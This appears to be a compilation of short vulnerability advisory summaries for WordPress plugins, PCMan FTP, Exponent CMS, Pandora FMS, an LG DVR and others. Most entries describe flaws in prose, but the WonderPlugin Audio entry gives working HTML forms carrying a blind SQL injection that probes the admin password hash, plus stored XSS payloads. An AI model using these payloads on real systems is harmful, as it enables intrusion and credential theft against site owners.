A stored cross-site scripting (XSS) vulnerability exists in the Fancybox-for-WordPress plugin version 3.0.2 for WordPress. An attacker can exploit this vulnerability to inject malicious JavaScript code into the application, which will be executed in the browser of the victim when the vulnerable page is accessed. This can be exploited by sending a specially crafted POST request to the vulnerable page with malicious JavaScript code in the 'mfbfw[padding]' parameter.
wp_ajax_save_item() is accessible for every registered user (admin privileges are not checked). save_item() uses is_id_exist() in which $id is not escaped properly. Login as standard user (created using wp-login.php?action=register) then: <form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wonderplugin_audio_save_item"> <input type="text" name="item[id]" value="1 UNION (SELECT 1, 2, 3, 4, IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1)"> <input type="submit" value="Hack!"> </form> This SQL will check if first password character user ID=1 is "$". If yes it will sleep 5 seconds. For XSS use: <form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wonderplugin_audio_save_item"> <input type="hidden" name="item[id]" value="1"> <input type="text" name="item[name]" value='<script>alert(String.fromCharCode(88,83,83));</script>'> <input type="text" name="item[customcss]" value='</style><script>alert(String.fromCharCode(88,83,83));</script>'> <input type="submit" value="Hack!"> </form> It will be visible on every page where shortcode wonderplugin_audio is used and also in admin panel: http://wordpress-url/wp-admin/admin.php?page=wonderplugin_audio_show_items http://security.szurek.pl/wonderplugin-audio-player-20-blind-sql-injection-and-xss.html
PCMan FTP Server v2.0.7 is vulnerable to a buffer overflow vulnerability when handling MKD commands. An attacker can send a specially crafted MKD command with an overly long string, which can cause a buffer overflow and allow the attacker to execute arbitrary code on the vulnerable system. The vulnerability is caused by a lack of proper bounds checking when handling MKD commands.
Realtek 11n Wireless LAN utility is deployed and used by realtek alfa cards and more in order to help diagnose and view wireless card properties. Unquoted Privilege escalation that allows a user to gain SYSTEM privileges.
Exponent CMS is a free, open source, open standards modular enterprise software framework and content management system (CMS) written in the PHP. Universal XSS - Exponent CMS builds the canonical path field from an unsanitized URL, which can be used to execute arbitrary scripts. XSS in user profiles. The "First Name" and "Last Name" fields on http://server/exponent/users/edituser are not sufficiently sanitized. Enter your favourite script and the application will execute it everytime for you.
Wordpress Video Gallery 2.7 suffers from a SQL injection vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the target server. This request contains a maliciously crafted 'vid' parameter in the 'wp-admin/admin-ajax.php?action=rss&type=video' URL. This can allow an attacker to execute arbitrary SQL commands on the underlying database.
During a penetration test, RedTeam Pentesting discovered that the IBM Endpoint Manager Relay Diagnostics page allows anybody to persistently store HTML and JavaScript code that is executed when the page is opened in a browser.
Pandora FMS version 5.1 SP1 is vulnerable to SQL injection. The vulnerability exists in the "index.php" page when processing the "login" parameter. A remote attacker can send a specially crafted request to the vulnerable page and execute arbitrary SQL commands in application`s database.
The WordPress Survey and Poll plugin is vulnerable to Blind SQL Injection due to the lack of sanitization of the 'survey_id' variable in the ajax_survey() function in the settings.php file. This allows an attacker to inject malicious SQL code into the application and execute it on the underlying database.
No authentication (login) is required to exploit this vulnerability. The LG DVR application is prone to a remote file disclosure vulnerability. An attacker can exploit this vulnerability to retrieve stored files on server such as '/etc/passwd' and '/etc/shadow' by using a simple url request which made by browser. More over, an attacker may be able to compromise encrypted login credentials for or retrieve the device's administrator password allowing them to directly access the device's configuration control panel.
Services By CQR